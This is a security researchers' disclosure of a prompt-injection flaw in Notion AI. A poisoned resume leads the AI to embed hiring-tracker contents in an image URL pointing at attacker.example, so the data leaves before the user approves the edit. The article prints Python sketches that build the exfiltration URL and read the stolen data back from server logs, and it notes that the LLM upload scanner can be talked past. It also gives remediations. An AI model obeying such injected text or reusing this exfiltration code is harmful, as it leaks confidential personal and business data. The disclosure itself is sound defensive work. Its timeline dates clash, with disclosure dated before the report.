
Threat Intelligence

Notion AI: Unpatched Data Exfiltration


Notion AI is susceptible to data exfiltration via indirect prompt injection due to a vulnerability in which AI document edits are saved before user approval.


Notion AI allows users to interact with their documents using natural language… but what happens when AI edits are made prior to user approval?

In this article, we document a vulnerability that leads Notion AI to exfiltrate user data (a sensitive hiring tracker document) via indirect prompt injection. Users are warned about an untrusted URL and asked for approval to interact with it, but their data is exfiltrated before they even respond.

We responsibly disclosed this vulnerability to Notion via HackerOne. Unfortunately, they said “we're closing this finding as Not Applicable”.

Stealing Hiring Tracker Data with a Poisoned Resume

The user uploads a resume (untrusted data) to their chat session. Here, the untrusted data source is a resume PDF, but a prompt injection could be stored in a web page, connected data source, or a Notion page.


This document contains a prompt injection hidden in 1-point white-on-white text, with a square white image covering the text for good measure. The LLM can read it without issue, but the document appears benign to the human eye.

A Note on Defenses: Notion AI uses an LLM to scan document uploads and present a warning if a document is flagged as malicious. As this warning is triggered by an LLM, it can be bypassed by a prompt injection that convinces the evaluating model that the document is safe. For this research, we did not focus on bypassing this warning because the point of the attack is the exfiltration mechanism, not the method of injection delivery. In practice, an injection could easily be stored in a source that does not appear to be scanned, such as a web page, Notion page, or connected data source like Notion Mail.

The user asks Notion AI for help updating a hiring tracker based on the resume.


Notion AI is manipulated by the prompt injection to insert a malicious image into the hiring tracker. The prompt injection manipulates Notion AI to (1) construct a URL by collecting all of the text in the document and appending the data to an attacker-controlled domain, and (2) insert an ‘image’ into the Notion Page using the constructed URL as the image source.
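The two steps the injection coerces can be sketched as follows. This is a hypothetical illustration, not the actual injection payload or Notion AI's internal tooling: `attacker.example`, the `d` parameter, and the helper function are all placeholders.

```python
from urllib.parse import quote

# Placeholder for an attacker-controlled domain (hypothetical).
ATTACKER_DOMAIN = "https://attacker.example/collect"

def build_exfil_image_markdown(document_text: str) -> str:
    """Sketch of the exfiltration primitive: pack the page contents into a
    URL query string, then wrap that URL in a Markdown image so that merely
    rendering the 'image' sends the data off-site."""
    exfil_url = f"{ATTACKER_DOMAIN}?d={quote(document_text)}"
    return f"![status]({exfil_url})"

markdown = build_exfil_image_markdown("Candidate: Jane Roe; Salary ask: $185k")
```

The key property is that no click is required: the browser issues the request the moment the image element is rendered.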


Here, it appears as though the user is prompted for approval. However, unbeknownst to the user, the edit has already occurred before the prompt appears. When the edit occurred, the user's browser made a request to the attacker's server, attempting to retrieve the image. This request exfiltrates the document contents contained in the URL constructed by Notion AI. Whether or not the user accepts the edit, the attacker has already exfiltrated the data.

The attacker reads the sensitive hiring tracker data from their server logs. Once the user's browser has made a request for the malicious image, the attacker can read the sensitive data contained in the URL from their request logs.
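On the attacker's side, recovering the data is just parsing the logged request path. The sketch below assumes the payload arrives percent-encoded in a query parameter named `d`; the parameter name and log format are assumptions for illustration.

```python
from urllib.parse import urlsplit, parse_qs

def recover_exfiltrated_data(request_path: str) -> str:
    """Pull the percent-encoded document text back out of a logged
    request path such as '/collect?d=...' (hypothetical shape)."""
    query = urlsplit(request_path).query
    # parse_qs percent-decodes values, restoring the original text.
    return parse_qs(query).get("d", [""])[0]

logged_path = "/collect?d=Candidate%3A%20Jane%20Roe%3B%20Salary%20ask%3A%20%24185k"
leaked = recover_exfiltrated_data(logged_path)
```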


In this attack, exfiltrated data included salary expectations, candidate feedback, internal role details, and other sensitive information such as diversity hiring goals.

Additional Attack Surface

The Notion Mail AI drafting assistant is also susceptible to rendering insecure Markdown images within email drafts, resulting in data exfiltration. If a user mentions an untrusted resource while drafting, content from the user's query or other mentioned resources can be exfiltrated, e.g., “Hey, draft me an email based on @untrusted_notion_page and @trusted_notion_page”.

The attack surface is reduced for Notion Mail's drafting assistant, as the system appears to have access only to data sources within the Notion ecosystem that are explicitly mentioned by the user (as opposed to Notion AI's main offering, which supports web search, document upload, integrations, etc.).

Recommended Remediations for Organizations:

Institute a vetting process for connected data sources. Restrict use of connectors that can access highly sensitive or highly untrusted data from: Settings > Notion AI > Connectors.

To reduce the risk of untrusted data being processed in the workspace, admins can configure: Settings > Notion AI > AI Web Search > Enable web search for workspace > Off.

Individual users should avoid including sensitive personal data that could be leveraged in a spearphishing attack when configuring personalization for Notion AI via: Settings > Notion AI > Personalization.

Individual users can configure: Settings > Notion AI > AI Web Search > Require confirmation for web requests > On.

Note: Implementing these remediations will reduce the risk surface, but will not nullify the core vulnerability.

Recommended Remediations for Notion:

Programmatically prohibit automatic rendering of Markdown images from external sites in Notion AI page creation or update outputs without explicit user approval.

Programmatically prohibit automatic rendering of Markdown images from external sites in Notion AI mail drafts.
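One way to enforce the two rendering prohibitions above is to strip external Markdown images server-side before any AI output is rendered. This is a minimal sketch under stated assumptions: the allowlisted host and the regex are illustrative, not Notion's implementation.

```python
import re
from urllib.parse import urlsplit

# Hypothetical allowlist of hosts whose images may render automatically.
ALLOWED_IMAGE_HOSTS = {"images.notion.example"}

# Matches Markdown images and captures the URL up to whitespace or ')'.
IMAGE_PATTERN = re.compile(r"!\[[^\]]*\]\(([^)\s]+)[^)]*\)")

def strip_external_images(markdown: str) -> str:
    """Drop any Markdown image whose source host is not allowlisted,
    so a constructed exfiltration URL is never fetched by the browser."""
    def _keep_or_drop(match: re.Match) -> str:
        host = urlsplit(match.group(1)).hostname or ""
        return match.group(0) if host in ALLOWED_IMAGE_HOSTS else ""
    return IMAGE_PATTERN.sub(_keep_or_drop, markdown)

draft = (
    "![logo](https://images.notion.example/logo.png) "
    "![x](https://attacker.example/collect?d=secret)"
)
cleaned = strip_external_images(draft)
```

Stripping (rather than merely warning) is what closes the gap, since the exfiltrating request fires on render, before any user decision.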

Implement a strong Content Security Policy. This will prevent network requests from being made to unapproved external domains.

Ensure the CDN used to retrieve images for display in Notion, and image previews for display in Notion Mail, cannot be used as an open redirect to bypass the CSP that is set.
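A CSP along the lines of the recommendations above could look like the following header; the CDN hostname is a placeholder, not Notion's actual infrastructure.

```
Content-Security-Policy: default-src 'self'; img-src 'self' https://images.trusted-cdn.example
```

With `img-src` restricted this way, the browser refuses to fetch an image from an attacker-controlled domain even if malicious Markdown reaches the renderer.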

Responsible Disclosure Timeline

12/24/2025: Initial report made via HackerOne
12/24/2025: Report acknowledged; altered write-up requested
12/24/2025: PromptArmor follows up with the requested format
12/29/2025: Report closed as Not Applicable
01/07/2025: Public disclosure

